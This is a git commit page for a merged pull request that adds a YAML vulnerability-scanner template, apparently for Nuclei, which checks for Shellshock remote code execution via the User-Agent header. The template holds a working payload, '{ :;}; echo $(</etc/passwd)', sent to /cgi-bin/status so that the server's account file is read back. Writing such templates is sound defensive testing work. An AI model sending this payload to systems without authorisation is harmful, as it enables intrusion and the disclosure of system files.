Merge pull request #127 from xElkomy/patch-1

Create rce-shellshock-user-agent.yaml
patch-1
bauthard 2020-05-28 21:07:54 +05:30 committed by GitHub
commit 8b2bc8ab8e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 19 additions and 0 deletions

View File

@ -0,0 +1,19 @@
id: rce-user-agent-shell-shock
info:
name: Remote Code Execution Via (User-Agent)
author: 0xelkomy
severity: high
requests:
- method: GET
headers:
User-Agent: "{ :;}; echo $(</etc/passwd)"
path:
- "{{BaseURL}}/cgi-bin/status"
matchers:
- type: word
words:
- "/bin/sh"
- "/bin/bash"
part: body